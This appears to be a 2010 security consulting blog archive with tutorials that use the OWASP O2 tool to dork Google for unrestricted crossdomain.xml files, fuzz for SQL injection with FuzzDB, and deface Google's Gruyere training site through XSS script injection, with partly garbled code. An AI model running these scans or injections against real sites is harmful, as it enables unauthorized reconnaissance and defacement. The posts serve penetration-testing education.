Parsons Software Security Consulting Blog

Archive for the ‘sofware security’ Category

How to find Crossdomain.xml Cross Site Request Forgery with 02

with one comment

Lately it seems that a lot of people are talking about the potential security vulnerabilities of having an unrestricted crossdomain.xml.   It’s public knowledge that this can be abused by an attacker setting up Cross Site Request Forgery.

Below is the sample code in the crossdomain.xml.   This is a simple one.  Some of the big websites that have these crossdomain.xml’s unrestricted have alot more data in the xml file.   From the blogs that I have read in the community and from HP Web Inspect Remediation Guide “Exploiting a Vulnerability Involves crafting a custom Flash Application”.


<site-control permitted-cross-domain-policies="all"/>

<allow-access-from domain="*"/>


The fix is “not to design and deploy Flash APIS meant to be accessible to arbitrary third parties.   It is also recommended “to host these on a sub domain”. We are not going to discuss how to exploit this vulnerability but rather to find it in the wild with 02.

So lets open up 02.   I like using Dinis Cruz’s version because it is more powerful.

Then lets open IE Automation.

Below is the default script in IE Automation that Dinis Created.  The default website is Google.

var ie = panel.add_IE().silent(true);"");

//using O2.XRules.Database.Utils.O2

var topPanel = panel.<strong>clear</strong>().<strong>add_Panel</strong>();
var ie = topPanel.<strong>add_IE</strong>().<strong>silent</strong>(<strong>true</strong>);
ie.<strong>field</strong>("Search").<strong>value</strong>("inurl:crossdomain.xml filetype:xml");
ie.<strong>button</strong>("Google Search").<strong>click</strong>();
var targetUrls = <strong>new </strong>List<string>();
<strong>foreach</strong>(var link <strong>in </strong>ie.<strong>links</strong>().<strong>urls</strong>())
<strong>if </strong>(link.<strong>ends</strong>("crossdomain.xml"))
var listOfUrls = topPanel.insert_Left<Panel>(250).<strong>add_TextArea</strong>().<strong>wordWrap</strong>(<strong>false</strong>);
return targetUrls;

//using  O2.XRules.Database.Utils.O2

var topPanel = panel.clear().add_Panel();
var ie = topPanel.add_IE().silent(true);"");
ie.field("Search").value("inurl:crossdomain.xml filetype:xml");
ie.button("Google Search").click();

var listOfUrls = topPanel.insert_Left<Panel>(350).add_TreeView();
var fileContents =listOfUrls.insert_Below<Panel>(200).add_SourceCodeViewer();

 (selectedUrl)=> {
 var html = selectedUrl.uri().getHtml();

foreach(var link in ie.links().urls())
 if (link.ends("crossdomain.xml"))


//using  O2.XRules.Database.Utils.O2

If the script executes properly it displays all the potential websites that are vulnerable to this vulnerability and then puts them inside of 02.  In order for them to be vulnerable allow-access-from-domain has to be set to *.    I don’t want to expose which sites are vulnerable due to legal reasons.   What is missing from the script is  is the rule that checks for the * value.

Many thanks to Dinis, all the security researchers that have been blogging about this vulnerability, HP, IBM and the Netsparker crew.

Matt Parsons, CISSP, MSM

mparsons [at]

Parsons Software Security Consulting, LLC Securing the Internet one Application at a time.

Written by mparsons1980

December 2, 2010 at 7:40 pm

SQL injection with 02 and FuzzDB Database plugin

with 3 comments

O2 Database plugin testing for SQL injection.

Now that we have covered XSS with 02 we are going to go through SQL injection using FuzzDB.

Adam Muntner created it using a number of sources.

fuzzdb helps identify security flaws in applications by aggregating known attack patterns, predictable resource names, and server response messages to create a comprehensive, repeatable set of malformed input test cases.

svn checkout fuzzdb-read-only 

This code uses the fuzzdb plugin and fuzz’s the database with different SQL injection payloads.   It then takes screen shots of each successful iteration.

The screen shots are above.   If you have any questions feel free to email me at

Once again Parsons Software Security Consulting, LLC is offering unauthenticated scans for the holidays.  A few people have taken me up on this offer.

Written by mparsons1980

November 25, 2010 at 3:04 am

XSS with 02 script editor Defacement on Gruyere

leave a comment »

Today’s post is going to go through step by step on Gruyere XSS defacement.

We already created our XSS builder with 02.   Now we are going to do a XSS defacement.

Above is the regular Gruyere Login page.   Below is Defacement with the IE Script Execution.

Here is all the code needed for the defacement.

using O2.XRules.Database.Utils;

using O2.XRules.Database.APIs;

using O2.External.SharpDevelop.Ascx;

using O2.External.SharpDevelop.ExtensionMethods;

using O2.DotNetWrappers.Network;

using O2.DotNetWrappers.DotNet;

using O2.DotNetWrappers.Windows;

using O2.DotNetWrappers.ExtensionMethods;

using O2.Views.ASCX.classes.MainGUI;

using O2.Views.ASCX.CoreControls;

using O2.Views.ASCX.ExtensionMethods;

using O2.Kernel.ExtensionMethods;

using O2.Kernel;

using O2.Interfaces;

using System.Linq;

using System.Xml.Linq;

using System.Xml;

using System.Collections.Generic;

using System.Windows.Forms;

using System.Drawing;

using System;

using O2.XRules.Database.Utils.O2;

public class DynamicType


public void dynamicMethod(object returnData, System.Windows.Forms.Panel panel)



var ie = panel.add_IE().silent(true);"");

var target = ie.elements("DIV").str("Gruyere: Login");


target.injectHtml("beforeBegin", "<h1>O2 Platform Demos</h1>" + "The best way to learn about the security vulnerabilities of this website is to use the <a href=\"http://o2platform\">OWASP O2 Platform</a>" + "<script DEFER> " + " //alert(document.links[0].href);" + " document.links[0].href = \"\";" + " document.images[0].src =\" <a href=""></a> " + "a0/6_22_2010_7_08_23_PM_tmp9E4.jpg\";" + " //alert(document.images[0].sec);" + " //document.images[1].href = " + " //alert(document.images[1].href);" + "</script>");




//using O2.XRules.Database.Utils.O2


This is what Dinis Created and what is under the hood of these little scripts. It’s a bit more complex.

I was speaking to Dinis and in his own words after  I questioned him about the code he explained some of it too me.

what happens when you select the ‘show/hide generated source code’ is that you see the actual method that gets compiled (basicaly I automatically put the text you put on the main script window inside that public object dynamicMethod(object returnData, string testString, int testNumber) method

– the silent(true) in IE is just to prevent pop-ups (and sometimes you need to put it to false since you need to act on those popups)

– the ‘flash()’ method is used to slow down a little bit the script execution and so that you can see visually which HTML field is being edited

If you have any questions e-mail me. Matt Parsons, CISSP, MSM

Parsons Software Security Consulting, LLC

Written by mparsons1980

November 25, 2010 at 1:39 am

XSS Exploit with 02 continued on Google Demo Hack Site

leave a comment »

In the spirit of Cross Site Scripting exploits with 02 we will continue to exploit using 02 XSS exploit script. This time I will use the script from Dinis Cruz’s powerful 02.

We are going to select XSS builder.

Google is kind enough to offer an attack website, Gruyere.  Only attack websites you are authorized to  attack.  Parsons Software Security Consulting, LLC assumes no liability in any damage that you do from unauthorized hacking.

We are going to attack the login page.

The website is vulnerable to XSS.  Next time we will create a script to show this attack and do a defacement.

If you have any questions or comments feel free to contact Matt Parsons.

Also Parsons Software Security Consulting, LLC is offering free unauthenticated web penetration test to the first 10 companies that respond by the end of the year 2010.

Written by mparsons1980

November 24, 2010 at 9:49 pm